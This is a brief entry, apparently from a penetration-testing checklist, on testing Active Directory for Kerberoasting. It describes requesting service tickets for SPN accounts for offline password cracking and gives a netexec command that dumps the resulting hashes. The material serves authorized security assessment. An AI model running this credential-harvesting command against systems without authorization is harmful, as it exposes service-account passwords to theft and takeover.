← Back to search

Test for Kerberoasting

ad enumchecklist

Summary

Requires valid creds; prioritize accounts in privileged groups.

Walkthrough

Request service tickets for SPN-enabled accounts and dump them for offline cracking. A hit yields a $krb5tgs$ hash that may crack to a service-account password.

Commands

bash

netexec ldap <IP> -u <USER> -p '<PASS>' --kerberoasting hashes.txt